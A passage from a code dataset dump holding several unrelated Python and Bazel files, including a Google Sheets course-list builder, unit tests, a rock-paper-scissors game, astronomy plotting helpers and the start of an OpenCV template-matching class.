'value': row[select_name]\n },\n created_at=conf.for_time\n )\n metrics_session.add(m)\n \n metrics_session.commit()\n\n\n \n","sub_path":"redata/models/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"181191500","text":"import asyncio\n\nfrom IGitt.GitHub import GitHubToken\nfrom IGitt.GitHub import lazy_get\n\nfrom tests import IGittTestCase\n\n\nclass GitHubInitTest(IGittTestCase):\n\n def test_tokens(self):\n github_token = GitHubToken('test')\n self.assertEqual(github_token.parameter, {'access_token': 'test'})\n self.assertEqual(github_token.value, 'test')\n\n async def lazy_get_response(self, data):\n self.assertEqual(data[0]['total'], 1)\n\n def test_lazy_get(self):\n loop = asyncio.get_event_loop()\n loop.run_until_complete(lazy_get('/repos/gitmate-test-user/test/stats/contributors',\n self.lazy_get_response))\n","sub_path":"tests/GitHub/test_github_init.py","file_name":"test_github_init.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"294619092","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ------------------------\n# Penji OpDev Fall 2019\n# < File Function >\n# Author: Cory Paik\n# Updated: < DD.MM.YEAR >\n# ------------------------\n\n# General\nimport os\nimport time\nimport argparse\nimport pandas as pd\n# For Google Sheets\nimport pygsheets\n# Local\nimport core.utils as utils\nfrom core import logger\n#import core.gsheets_utils as gs_utils\nimport core.gs_api_utils as gs_api_\nfrom core.config import cfg\n\n\nclass GoogleSheetsParent:\n def __init__(self, args):\n self.args = args\n self.reset_gs = args.reset\n\n # Get the term (, , )\n try:\n self.cterm = cfg.GENERAL[args.term.upper()]\n self.pterm = cfg.GENERAL[args.term.upper()+'_PREV']\n except KeyError:\n logger.error(f'{args.term} not a valid option for term')\n raise SystemExit\n # Get the school config\n try:\n self.school_config = cfg[args.school.upper()]\n except KeyError:\n logger.error(f'{args.school} not a valid option for school')\n raise SystemExit\n\n\n self.files = {\n # Current Term Files\n 'ct' : (0, f'{self.cterm[0]}', self._setup_term,\n f'data/{args.school}/{self.cterm[1]}/gs_{self.cterm[1]}_{args.school}_0.csv'),\n 'ct_prof' : (1, f'Professors {self.cterm[2]}', self._setup_prof ,\n f'data/{args.school}/{self.cterm[1]}/gs_{self.cterm[1]}_{args.school}_1.csv'),\n 'ct_courses' : (2, f'Courses {self.cterm[2]}', self._setup_courses ,\n f'data/{args.school}/{self.cterm[1]}/gs_{self.cterm[1]}_{args.school}_2.csv'),\n # Previous Term Files\n 'pt' : (3, f'{self.pterm[0]}', self._setup_term,\n f'data/{args.school}/{self.pterm[1]}/gs_{self.pterm[1]}_{args.school}_0.csv'),\n 'pt_prof' : (4, f'Professors {self.pterm[2]}', self._setup_prof ,\n f'data/{args.school}/{self.pterm[1]}/gs_{self.pterm[1]}_{args.school}_1.csv'),\n 'pt_courses' : (5, f'Courses {self.pterm[2]}', self._setup_courses ,\n f'data/{args.school}/{self.pterm[1]}/gs_{self.pterm[1]}_{args.school}_2.csv'),\n # Archive Files\n 'archive_tutors' : (6, 'Tutors' , self._setup_tutors ,\n f'data/{args.school}/archive/gs_archive_{args.school}_6.csv'),\n 'archive_prof' : (7, 'Professor Archive', self._setup_archive_prof ,\n f'data/{args.school}/archive/gs_archive_{args.school}_7.csv'),\n 'archive_courses' : (8, 'Course Archive', self._setup_archive_courses ,\n f'data/{args.school}/archive/gs_archive_{args.school}_8.csv'),\n # Scraped Course Lists\n 'ct_cl' : (-1, None, None,f'data/{args.school}/{self.cterm[1]}/{args.school}_course_list.csv'),\n 'pt_cl' : (-1, None, None, f'data/{args.school}/{self.pterm[1]}/{args.school}_course_list.csv'),\n\n # Student Orgs\n 'student_orgs' : (-1, 'Student Orgs', None, f'data/{args.school}/{self.cterm[1]}/gs_{args.school}_{self.cterm[1]}_Student_Orgs.csv')\n\n }\n\n self.file_keys = ('ct', 'ct_prof', 'ct_courses', 'pt', 'pt_prof', 'pt_courses',\n 'archive_tutors', 'archive_prof', 'archive_courses')\n\n def _load_all(self):\n return [self._load(key) for key in self.file_keys]\n\n\n def _load(self, file_name_key):\n file_name = self.files[file_name_key][3]\n try:\n df = pd.read_csv(file_name)\n logger.info(f'Found Existing {self.files[file_name_key][1]}')\n return df\n except FileNotFoundError:\n #logger.error(f'File not found: {file_name}')\n self._setup(file_name_key)\n # raise SystemExit\n\n def _save(self, df, file_name_key):\n file_name = self.files[file_name_key][3]\n df.to_csv(index=False, path_or_buf=file_name)\n\n def _connect_google_sheet(self, sheet_name_in=None):\n # Create a new sheet in folder\n sheet_name = sheet_name_in if sheet_name_in else f'{self.school_config.NICE_NAME} Course List'\n gc = pygsheets.authorize(service_file='core/credentials/penji_dev_key.json')\n try:\n sh = gc.open(sheet_name)\n if self.reset_gs:\n gc.drive.delete(sh.id, supportsTeamDrives=True)\n sh = gc.create(sheet_name, folder=self.school_config.FOLDER_ID)\n logger.info(f'Reset {sheet_name} in google drive')\n else:\n logger.info(f'Found {sheet_name} in google drive, modifying sheet')\n except (pygsheets.exceptions.SpreadsheetNotFound, pygsheets.exceptions.WorksheetNotFound) as e:\n logger.info(f'Could not find {sheet_name} in google drive, creating a new one')\n sh = gc.create(sheet_name, folder=self.school_config.FOLDER_ID)\n self.reset_gs = True\n return sh\n\n def _setup_all(self):\n for key in self.file_keys:\n if not os.path.exists(self.files[key][3]):\n df = self._setup(key)\n self._save(df, key)\n while not os.path.exists(self.files[key][3]):\n time.sleep(1)\n\n def _setup(self, file_name_key):\n file_info = self.files[file_name_key]\n sheet_idx = file_info[0]\n gs_cl_df = None\n # Current term setup\n if sheet_idx in (0, 1, 2):\n try:\n gs_cl_df = pd.read_csv(self.files['ct'][3])\n except FileNotFoundError:\n logger.info(f'No existing Google Sheets current term file in location {self.files[\"ct\"][3]}')\n try:\n cl_df = pd.read_csv(self.files['ct_cl'][3])\n except FileNotFoundError:\n logger.info(f'No existing course list csv file found in location {self.files[\"ct_cl\"][3]}')\n raise SystemExit\n gs_cl_df = self._setup_term(cl_df)\n if self.args.save:\n self._save(gs_cl_df, 'ct')\n # If current term csv\n gs_df = gs_cl_df if sheet_idx == 0 else file_info[2](gs_cl_df)\n # Previous Term\n elif sheet_idx in (3, 4, 5):\n try:\n gs_cl_df = pd.read_csv(self.files['pt'][3])\n except FileNotFoundError:\n logger.info(f'No existing Google Sheets current term file in location {self.files[\"ct\"][3]}')\n gs_df = file_info[2](gs_cl_df)\n # Tutors & Archive\n elif sheet_idx in (6, 7, 8):\n gs_df = file_info[2](None)\n # Error, invalid sheet\n else:\n logger.error(f'{sheet_idx} not valid sheet index')\n raise SystemExit\n if self.args.save:\n self._save(gs_df, file_name_key)\n return gs_df\n\n def _setup_term(self, df):\n gs_data = None\n if isinstance(df, pd.DataFrame):\n num_rows = len(df.index)\n gs_data = {key: [None] * num_rows for key in cfg.GENERAL.WKS_COLUMNS['Term']}\n key_set = {\n 'Abbreviation': 'Department_Abbreviation',\n 'Course': 'Course_Number',\n 'Name': 'Department_Name',\n 'Title': 'Course_Name',\n 'Professor': 'Section_Professor',\n '# Students': 'Number_Students',\n 'Time': 'Section_Time',\n 'Days': 'Section_Days',\n 'Classroom': 'ClassRoom',\n 'Section Reference #': 'Reference_Number'\n }\n\n for idx, col in df.iterrows():\n # Set Directly transferable data\n for gs_key, df_key in key_set.items():\n temp_val = df[df_key][idx]\n if isinstance(temp_val, str):\n #print(temp_val)\n temp_val = temp_val.strip() # TODO: Correct formatting to avoid whitespace\n gs_data[gs_key][idx] = temp_val\n # Set Course Code\n gs_data['Course Code'][idx] = str(df['Department_Abbreviation'][idx]) + ' ' + str(\n df['Course_Number'][idx])\n\n term_df = pd.DataFrame(data=gs_data, columns=cfg.GENERAL.WKS_COLUMNS['Term'])\n\n\n print(f'num students col\\n',term_df['# Students'])\n term_df = term_df[term_df['# Students'] != 'Canceled']\n term_df['# Students'] = term_df['# Students'].fillna(0)\n term_df = term_df.astype(dtype={'# Students': 'int64'})\n # Workaround: If School had no student count\n if not sum(term_df['# Students']) == 0:\n term_df = term_df[term_df['# Students'] > 10]\n else:\n term_df = pd.DataFrame(data=gs_data, columns=cfg.GENERAL.WKS_COLUMNS['Term'])\n print(term_df.head())\n return term_df\n\n def _setup_prof(self, df):\n gs_data = None\n if isinstance(df, pd.DataFrame):\n all_prof = list(df['Professor'])\n professors = list({}.fromkeys(all_prof).keys())\n professors = list(set(filter(lambda v: v == v and v != '', professors)))\n full_names, first_names, last_names = [], [], []\n for all_names in professors:\n names_split = all_names.split(', ')\n for name in names_split:\n if name not in full_names:\n full_names.append(name)\n split_name = name.split()\n first_names.append(split_name[0])\n last_names.append(' '.join(split_name[1:]))\n\n gs_data = {'Full Name': full_names, 'Salutation': ['Dr.'] * len(full_names), 'First Name': first_names,\n 'Last Name': last_names, }\n prof_df = pd.DataFrame(data=gs_data, columns=cfg.GENERAL.WKS_COLUMNS['Professors'])\n return prof_df\n\n def _setup_courses(self, term_df):\n gs_data = None\n if isinstance(term_df, pd.DataFrame):\n # takes in term df\n data = {key: [] for key in cfg.GENERAL.WKS_COLUMNS['Courses']}\n for idx, col in term_df.iterrows():\n if term_df['Course Code'][idx] not in data['Course Code']:\n data['Course Code'].append(term_df['Course Code'][idx])\n data['Name'].append(term_df['Name'][idx])\n data['Title'].append(term_df['Title'][idx])\n num_rows = len(data['Course Code'])\n gs_data = {key: ([None] * num_rows if lst == [] else lst) for key, lst in data.items()}\n courses_df = pd.DataFrame(data=gs_data, columns=cfg.GENERAL.WKS_COLUMNS['Courses'])\n return courses_df\n\n def _setup_tutors(self, df):\n gs_data = None\n if isinstance(df, pd.DataFrame):\n tutors_df = df\n # num_rows = len(df.index)\n # gs_data = {key: [None] * num_rows for key in cfg.GENERAL.WKS_COLUMNS['Tutors']}\n tutors_df = pd.DataFrame(data=gs_data, columns=cfg.GENERAL.WKS_COLUMNS['Tutors'])\n return tutors_df\n\n def _setup_archive_prof(self, df):\n gs_data = None\n if isinstance(df, pd.DataFrame):\n all_prof = list(df['Professor'])\n professors = list({}.fromkeys(all_prof).keys())\n professors = list(set(filter(lambda v: v == v, professors)))\n full_names, first_names, last_names = [], [], []\n for all_names in professors:\n names_split = all_names.split(', ')\n for name in names_split:\n if name not in full_names:\n full_names.append(name)\n split_name = name.split()\n first_names.append(split_name[0])\n last_names.append(' '.join(split_name[1:]))\n\n gs_data = {'Full Name': full_names, 'Salutation': ['Dr.'] * len(full_names), 'First Name': first_names,\n 'Last Name': last_names, }\n\n prof_df = pd.DataFrame(data=gs_data, columns=cfg.GENERAL.WKS_COLUMNS['Professor Archive'])\n return prof_df\n\n\n def _setup_archive_courses(self, term_df):\n gs_data = None\n if isinstance(term_df, pd.DataFrame):\n data = {key: [] for key in cfg.GENERAL.WKS_COLUMNS['Course Archive']}\n for idx, col in term_df.iterrows():\n if term_df['Course Code'][idx] not in data['Course Code']:\n data['Course Code'].append(term_df['Course Code'][idx])\n data['Name'].append(term_df['Name'][idx])\n data['Title'].append(term_df['Title'][idx])\n num_rows = len(data['Course Code'])\n gs_data = {key: ([None] * num_rows if lst == [] else lst) for key, lst in data.items()}\n courses_df = pd.DataFrame(data=gs_data, columns=cfg.GENERAL.WKS_COLUMNS['Course Archive'])\n return courses_df\n\n\n\n\n def run(self, *args, **kwargs):\n\n\n raise NotImplementedError\n\n\n\n","sub_path":"code/WEBSCRAPER PYTHON/core/gs_parent.py","file_name":"gs_parent.py","file_ext":"py","file_size_in_byte":13238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"650367409","text":"import xml.etree.ElementTree as ET\nfrom csv import DictWriter\n\nfrom utils.data_helper import get_words_only\n\ndata = ET.parse('data/full.xml')\nlabelling_file_path = 'data/document_id.csv'\n\nlabelling_file = open(labelling_file_path, 'w')\nlabelling_csv = DictWriter(labelling_file, fieldnames=['sentence_id', 'text', 'document_id'])\nlabelling_csv.writeheader()\n\nroot = data.getroot()\n\nfor sentence in root:\n text = ' '.join([get_words_only(phrase.text) for phrase in sentence])\n labelling_csv.writerow({'sentence_id': sentence.attrib['id'], 'text': text, 'document_id': ''})\n\nlabelling_file.close()\n","sub_path":"prepare_data_for_document_id_labelling.py","file_name":"prepare_data_for_document_id_labelling.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"512653664","text":"def name_to_number(name):\n\n \n \n if (name=='rock'):\n choice_val = 0;\n elif (name=='Spock'):\n choice_val = 1;\n elif (name=='paper'):\n choice_val = 2\n elif (name=='lizard'):\n choice_val = 3\n elif (name=='scissors'):\n choice_val = 4 \n else: \n choice_val = \"\"\n \n return choice_val \n \n\ndef number_to_name(number):\n if (number<=4): \n if (number==0):\n choice_val = 'rock'\n elif (number==1):\n choice_val = 'Spock'\n elif (number==2):\n choice_val = 'paper'\n elif (number==3):\n choice_val = 'lizard'\n elif (number==4):\n choice_val = 'scissors' \n else: \n choice_val = \"\"\n \n return choice_val \n \n else:\n return \"\"\n \n \n \n \n \ndef rpsls():\n import random \n comp_number = random.randrange(0,4) \n player_number = random.randrange(0,4)\n\n \n\n print (\"Player chooses \",number_to_name(player_number),\" \")\n print (\"Computer chooses \",number_to_name(comp_number),\"\")\n\n\n if (comp_number>player_number):\n print (\"Computer wins!\\n\")\n elif(comp_number.\n\nimport unittest\nimport logging\n\nlogger = logging.getLogger(__name__)\n\nTEST_USERNAME = \"_modeltest\"\n\nclass TestCase(unittest.TestCase):\n\t@property\n\tdef models(self):\n\t\treturn [m.model for m in self._mm.mods(\"active\", type=\"typingTutorModel\")]\n\n\tdef setUp(self):\n\t\tfor m in self.models:\n\t\t\tm.registerUser(TEST_USERNAME)\n\n\tdef tearDown(self):\n\t\tfor m in self.models:\n\t\t\tm.deregisterUser(TEST_USERNAME)\n\n\tdef testRegisterUnregisterErrors(self):\n\t\tfor m in self.models:\n\t\t\twith self.assertRaises(m.UsernameEmptyError):\n\t\t\t\tm.registerUser(\"\")\n\t\t\twith self.assertRaises(m.UsernameTakenError):\n\t\t\t\tm.registerUser(TEST_USERNAME, \"COLEMAK_LAYOUT\")\n\t\t\tm.deregisterUser(TEST_USERNAME)\n\t\t\twith self.assertRaises(KeyError):\n\t\t\t\tm.deregisterUser(TEST_USERNAME)\n\t\t\t#for tearDown\n\t\t\tm.registerUser(TEST_USERNAME)\n\n\tdef testUsernames(self):\n\t\tfor m in self.models:\n\t\t\tself.assertIn(TEST_USERNAME, m.usernames)\n\n\tdef _constructArgsForSession(self):\n\t\targList = [\n\t\t\tNone,\n\t\t\t(TEST_USERNAME, 20, 0),\n\t\t\t(TEST_USERNAME, 10, 3),\n\t\t\t(TEST_USERNAME, 30, 2),\n\t\t\tNone,\n\t\t\t(TEST_USERNAME, 10, 0),\n\t\t]\n\t\tfor i in range(50):\n\t\t\targList.append((TEST_USERNAME, 10, 0))\n\t\targList.append(None)\n\t\targList.append((TEST_USERNAME, 5, 3))\n\t\targList.append(None)\n\t\tfor i in range(10):\n\t\t\targList.append((TEST_USERNAME, 5, 0))\n\t\treturn argList\n\n\tdef _examineAmountOfMistakes(self, model, iteration):\n\t\t#the first iteration, no test results are known yet.\n\t\tif iteration == 0:\n\t\t\twith self.assertRaises(IndexError):\n\t\t\t\tmodel.amountOfMistakes(TEST_USERNAME)\n\t\telse:\n\t\t\tself.assertIsInstance(model.amountOfMistakes(TEST_USERNAME), int)\n\n\tdef _examineInstruction(self, model):\n\t\tinstruction = model.currentInstruction(TEST_USERNAME)\n\t\tlogger.debug(\"INSTRUCTION: \" + instruction)\n\t\tself.assertIsInstance(instruction, basestring)\n\t\tself.assertTrue(instruction)\n\n\tdef _examineExercise(self, model):\n\t\texercise = model.currentExercise(TEST_USERNAME)\n\t\tlogger.debug(\"NEW EXERCISE: \" + exercise)\n\t\tself.assertIsInstance(exercise, basestring)\n\t\tself.assertTrue(exercise)\n\n\tdef _examineLayout(self, model):\n\t\tself.assertEqual(model.layout(TEST_USERNAME), model.QWERTY_LAYOUT)\n\n\tdef _examineLevel(self, model):\n\t\tlevel = model.level(TEST_USERNAME)\n\t\tlogger.debug(\"LEVEL: %s\", level)\n\t\tself.assertIsInstance(level, int)\n\t\tself.assertTrue(level >= 0)\n\n\tdef _examineMaxLevel(self, model):\n\t\tmaxLevel = model.maxLevel(TEST_USERNAME)\n\t\tself.assertIsInstance(maxLevel, int)\n\t\tself.assertTrue(maxLevel >= 0)\n\n\tdef _examineSpeed(self, model, iteration):\n\t\tif iteration == 0:\n\t\t\twith self.assertRaises(IndexError):\n\t\t\t\tmodel.speed(TEST_USERNAME)\n\t\telse:\n\t\t\tspeed = model.speed(TEST_USERNAME)\n\t\t\tlogger.debug(\"SPEED PREVIOUS EXERCISE: %s wpm\", speed)\n\t\t\tself.assertIsInstance(speed, int)\n\t\t\tself.assertTrue(speed >= 0)\n\n\tdef _examineTargetSpeed(self, model):\n\t\ttargetSpeed = model.targetSpeed(TEST_USERNAME)\n\t\tself.assertIsInstance(targetSpeed, int)\n\t\tself.assertTrue(targetSpeed >= 0)\n\n\tdef testSession(self):\n\t\t\"\"\"This test has some lines commented out which can be very\n\t\t useful while debugging.\n\n\t\t\"\"\"\n\t\targList = self._constructArgsForSession()\n\n\t\tfor model in self.models:\n\t\t\tfor iteration, args in enumerate(argList):\n\t\t\t\tif args:\n\t\t\t\t\tmodel.setResult(*args)\n\n\t\t\t\tself._examineAmountOfMistakes(model, iteration)\n\t\t\t\tself._examineInstruction(model)\n\t\t\t\tself._examineExercise(model)\n\t\t\t\tself._examineLayout(model)\n\t\t\t\tself._examineLevel(model)\n\t\t\t\tself._examineMaxLevel(model)\n\t\t\t\tself._examineSpeed(model, iteration)\n\t\t\t\tself._examineTargetSpeed(model)\n\n\t\t\t\tlogger.debug(\"\")\n\nclass TestModule(object):\n\tdef __init__(self, moduleManager, *args, **kwargs):\n\t\tsuper(TestModule, self).__init__(*args, **kwargs)\n\t\tself._mm = moduleManager\n\n\t\tself.type = \"test\"\n\t\tself.requires = (\n\t\t\tself._mm.mods(type=\"typingTutorModel\"),\n\t\t)\n\n\tdef enable(self):\n\t\tself.TestCase = TestCase\n\t\tself.TestCase._mm = self._mm\n\t\tself.active = True\n\n\tdef disable(self):\n\t\tself.active = False\n\t\tdel self.TestCase\n\ndef init(moduleManager):\n\treturn TestModule(moduleManager)\n","sub_path":"modules/org/openteacher/logic/interfaces/typingTutorModelTest/typingTutorModelTest.py","file_name":"typingTutorModelTest.py","file_ext":"py","file_size_in_byte":4746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"293704640","text":"# buildifier: disable=module-docstring\nload(\"@bazel_tools//tools/build_defs/repo:http.bzl\", \"http_archive\")\nload(\"@bazel_tools//tools/build_defs/repo:utils.bzl\", \"maybe\")\n\ndef repositories():\n \"\"\"Load all repositories needed for the targets of rules_foreign_cc_examples\"\"\"\n\n maybe(\n http_archive,\n name = \"rules_cc\",\n strip_prefix = \"rules_cc-b1c40e1de81913a3c40e5948f78719c28152486d\",\n url = \"https://github.com/bazelbuild/rules_cc/archive/b1c40e1de81913a3c40e5948f78719c28152486d.zip\",\n sha256 = \"d0c573b94a6ef20ef6ff20154a23d0efcb409fb0e1ff0979cec318dfe42f0cdd\",\n type = \"zip\",\n )\n\n maybe(\n http_archive,\n name = \"rules_android\",\n urls = [\"https://github.com/bazelbuild/rules_android/archive/v0.1.1.zip\"],\n sha256 = \"cd06d15dd8bb59926e4d65f9003bfc20f9da4b2519985c27e190cddc8b7a7806\",\n strip_prefix = \"rules_android-0.1.1\",\n )\n\n RULES_JVM_EXTERNAL_TAG = \"4.0\"\n RULES_JVM_EXTERNAL_SHA = \"31701ad93dbfe544d597dbe62c9a1fdd76d81d8a9150c2bf1ecf928ecdf97169\"\n\n maybe(\n http_archive,\n name = \"rules_jvm_external\",\n strip_prefix = \"rules_jvm_external-%s\" % RULES_JVM_EXTERNAL_TAG,\n sha256 = RULES_JVM_EXTERNAL_SHA,\n url = \"https://github.com/bazelbuild/rules_jvm_external/archive/%s.zip\" % RULES_JVM_EXTERNAL_TAG,\n )\n\n maybe(\n http_archive,\n name = \"cmake_hello_world_variant_src\",\n build_file_content = \"\"\"filegroup(name = \"all\", srcs = glob([\"**\"]), visibility = [\"//visibility:public\"])\"\"\",\n strip_prefix = \"cmake-hello-world-master\",\n urls = [\n \"https://mirror.bazel.build/github.com/jameskbride/cmake-hello-world/archive/master.zip\",\n \"https://github.com/jameskbride/cmake-hello-world/archive/master.zip\",\n ],\n sha256 = \"d613cf222bbb05b8cff7a1c03c37345ed33744a4ebaf3a8bfd5f56a76e25ca08\",\n )\n","sub_path":"examples/deps/repositories.bzl","file_name":"repositories.bzl","file_ext":"bzl","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"117223949","text":"from rest_framework import serializers\nfrom .models import Topping, Pizza\n\nclass ToppingSerializer(serializers.ModelSerializer):\n class Meta:\n model = Topping\n fields = '__all__'\n\nclass PizzaSerializer(serializers.ModelSerializer):\n # pizza_toppings = ToppingSerializer(many=True, required=False)\n class Meta:\n model = Pizza\n fields = '__all__'","sub_path":"shop/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"526038434","text":"\"\"\"$Id: mapmaking_plots.py\n$auth: Martin Gamboa & Jean-Christophe Hamilton & James Murphy\n$created: Fri 11 Feb 2022\n\nInspired and using the methods created by Jean-Christophe and James Murphy \n\t\tto do map-making with real data + demodulated scripts done by James. \n \nThis file contains functions to make consistency plots to check all is working well \n\n\"\"\"\n\nimport os\nimport sys \n\nimport numpy as np\nimport matplotlib.pyplot as plt \nfrom astropy.io import fits as pyfits\n\nimport scipy.ndimage.filters as f\nimport qubic.sb_fitting as sbfit\nimport qubic.demodulation_lib as dl\n\ndef plot_scan(time_axis, t_src, data_src, az, el):\n\t\"\"\"\n\tPlot the scan in azimuth and elevation. Data + Calibration source\n\t\"\"\"\n\n\tplt.rc('figure',figsize = (12,12))\n\n\ttinit = time_axis[0]\n\n\tplt.subplot(2,2,1)\n\tplt.plot((time_axis - tinit)/3600, az,',')\n\tplt.xlabel('Time [h]')\n\tplt.ylabel('Az')\n\tplt.subplot(2,2,2)\n\tplt.plot((time_axis - tinit)/3600, el,',')\n\tplt.xlabel('Time [h]')\n\tplt.ylabel('El')\n\tplt.ylim(30,70)\n\n\tplt.subplot(2,2,3)\n\tplt.plot(az * np.cos(np.radians(el)), el,',')\n\tplt.xlabel('Az')\n\tplt.ylabel('El')\n\n\tplt.subplot(2,2,4)\n\tplt.plot((t_src - tinit)/3600, data_src,',')\n\tplt.xlabel('Time [h]')\n\tplt.ylabel('Src Data')\n\n\n\treturn\n\ndef plot_raw_data(tod_time, tod_data, calsrc_time, calsrc_data,\n\tTESNum = None, asic = None):\n\n\t\"\"\"\n\tPlot calibration source and raw data in hours\n\t\"\"\"\n\tplt.plot(calsrc_time / 3600, dl.renorm(calsrc_data), \n\t\tlabel='Calsource', color='tab:orange')\n\tplt.plot(tod_time / 3600, dl.renorm(tod_data), \n label = 'Data TES {} ASIC {}'.format(TESNum,asic), \n color = 'tab:blue')\n\tplt.xlabel('Unix Epoch (s)')\n\n\tplt.legend(loc = 'upper left')\n\n\tplt.show()\n\n\treturn\n\ndef plot_data_and_src(tod_time, tod_data, tod_data_filtered,\n\tcalsrc_time, calsrc_data, **kwargs_plot):#ylim = [-5,5]):\n\t\"\"\"\n\tPlot calibration source, raw and filtered data\n\t\"\"\"\n\n\tplt.figure(figsize = (16,8))\n\tplt.plot(calsrc_time, (calsrc_data - np.mean(calsrc_data)) / np.std(calsrc_data), \n\t color = 'tab:orange', label = 'Calibration Source', alpha = 0.5)\n\tplt.plot(tod_time, (tod_data_filtered - np.mean(tod_data_filtered)) / np.std(tod_data_filtered), \n\t color = 'tab:green', label = 'Filtered Data', alpha = 0.5)\n\tplt.plot(tod_time, (tod_data - np.mean(tod_data)) / np.std(tod_data), \n\t label = 'Raw Data', color = 'tab:blue', alpha = 0.99)\n\tplt.xlabel('Unix Epoch (s)')\n\t\n\t#plt.xlim(kwargs_plot[\"xmin\"], kwargs_plot[\"xmax\"])\n\t#plt.ylim(kwargs_plot[\"ymin\"], kwargs_plot[\"ymax\"])\n\tplt.ylim(-5,5)\n\tplt.legend()\n\n\treturn\n\n\n\ndef plot_spectra_comparisson(frequency_raw, spectra_raw, frequency_filtered, spectra_filtered,\n\tperiod, lowcut, highcut, notch, nharm = 10,\n\tTESNum = None, asic = None,\n\txlim = [0.01, 90], \n\tylim = [1e1, 1e17]):\n\t\"\"\"\n\tThis method compare raw spectra vs filtered spectra\n\t\"\"\"\n\n\tplt.rc('figure', figsize = (13,8))\n\n\t#xmin, xmax, ymin, ymax = 0.01, 90, 1e1, 1e17\n\n\t############ Power spectrum\n\tplt.plot(frequency_raw, f.gaussian_filter1d(spectra_raw, 1), \n\t label = 'Raw Data')\n\tplt.yscale('log')\n\tplt.xscale('log')\n\tplt.xlabel('Frequency [Hz]')\n\tplt.ylabel('Power Spectrum')\n\tplt.xlim(xlim[0], xlim[1])\n\tplt.ylim(ylim[0], ylim[1])\n\tplt.title('TES {} ASIC {}'.format(TESNum, asic))\n\n\tfor i in range(10):\n\t plt.plot([1. / period * i, 1. / period * i], [ylim[0], ylim[1]],\n\t 'k--', alpha = 0.3)\n\n\tplt.plot([lowcut, lowcut], [ylim[0], ylim[1]], 'k')\n\tplt.plot([highcut, highcut], [ylim[0], ylim[1]], 'k')\n\tplt.legend()\n\n\t########## New Power spectrum\n\tplt.plot(frequency_filtered, f.gaussian_filter1d(spectra_filtered, 1), label = 'Filtered data')\n\tfor i in range(nharm):\n\t plt.plot([notch[0,0] * (i + 1), notch[0,0] * (i + 1)], \n\t [ylim[0], ylim[1]], 'm:')\n\t \n\tplt.legend(loc = 'upper left')\n\n\tplt.tight_layout()\n\n\tplt.show()\n\n\treturn\n\ndef plot_synchronizated_data(tod_time, src_time, tod_data, src_data):\n\t\"\"\"\n\n\t\"\"\"\n\n\t#make some start and endpoints for plotting\n\tendpt2 = max(tod_time) + 2\n\tendpt1 = max(tod_time) - 3\n\tstartp1 = min(tod_time) - 1\n\tstartp2 = min(tod_time) + 4\n\n\tplt.figure(figsize = (16,12))\n\t#zoom on signal\n\tplt.subplot(2,2,3)\n\tplt.plot(src_time, (src_data - np.mean(src_data))/np.std(src_data), \n\t\t\t\tcolor = 'tab:orange', label = 'Measured Source Signal', alpha = 0.5)\n\tplt.plot(tod_time, (tod_data - np.mean(tod_data))/np.std(tod_data),\n\t\t\t\tcolor = 'tab:green', label = 'Filtered Data', alpha = 0.5)\n\tplt.ylim(-5,5)\n\tplt.xlim(1.596100115e+09, 1.596100125e+09)\n\tplt.legend(loc = 'lower right')\n\t#zoom on signal\n\tplt.subplot(2,2,4)\n\tplt.plot(src_time, (src_data - np.mean(src_data))/np.std(src_data), \n\t\t\t\tcolor = 'tab:orange', label = 'Measured Source Signal', alpha = 0.5)\n\tplt.plot(tod_time, (tod_data-np.mean(tod_data))/np.std(tod_data), \n\t\t\t\tcolor = 'tab:green', label = 'Filtered Data', alpha = 0.5)\n\tplt.ylim(-5,5)\n\tplt.xlim(1.59611721e+09, 1.59611722e+09)\n\tplt.legend(loc = 'lower right')\n\t#start point\n\tplt.figure(figsize = (16,6))\n\tplt.subplot(1,2,1)\n\tplt.plot(src_time, (src_data - np.mean(src_data))/np.std(src_data), \n\t\t\t\tcolor = 'tab:orange', label = 'Measured Source Signal', alpha = 0.5)\n\tplt.plot(tod_time, (tod_data - np.mean(tod_data))/np.std(tod_data), \n\t\t\t\tcolor = 'tab:green', label = 'Filtered Data', alpha = 0.5)\n\tplt.ylim(-5,5)\n\tplt.xlim(startp1, startp2)\n\tplt.legend(loc = 'lower right')\n\t#endpoint\n\tplt.subplot(1,2,2)\n\tplt.plot(src_time, (src_data - np.mean(src_data))/np.std(src_data), \n\t\t\t\tcolor = 'tab:orange', label = 'Measured Source Signal', alpha = 0.5)\n\tplt.plot(tod_time, (tod_data - np.mean(tod_data))/np.std(tod_data),\n\t\t\t\tcolor = 'tab:green', label = 'Filtered Data', alpha = 0.5)\n\tplt.ylim(-5,5)\n\tplt.xlim(endpt1, endpt2)\n\tplt.legend(loc = 'lower right')\n\n\treturn","sub_path":"qubic/scripts/Calibration/Point_source_reconstruction/mapmaking_plots.py","file_name":"mapmaking_plots.py","file_ext":"py","file_size_in_byte":5738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"618823677","text":"# template_matching.py\r\n\r\nimport cv2\r\nimport imutils\r\nimport numpy as np\r\n\r\n\r\nclass TemplateMatching:\r\n\r\n def __init__(self, plate_image, template):\r\n self.plate_image = plate_image.copy()\r\n self.template = template\r\n self.gray_plate_img = cv2.cvtColor(plate_image, cv2.COLOR_BGR2GRAY)\r\n self.info = None\r\n self.drew_img = None\r\n\r\n\r\n def find_position(self):\r\n # template will be single or double\r\n template_gray = cv2.cvtColor(self.template, cv2.COLOR_BGR2GRAY)\r\n template_canny = cv2.Canny(template_gray, 50, 200)\r\n (tH, tW) = template_canny.shape[:2]\r\n gray = self.gray_plate_img\r\n info = None\r\n\r\n # loop over the scales of the image ( multiply 2 ~ 0.1 on plate image)\r\n for scale in np.linspace(0.1, 2.0, 50)[::-1] :\r\n\r\n # 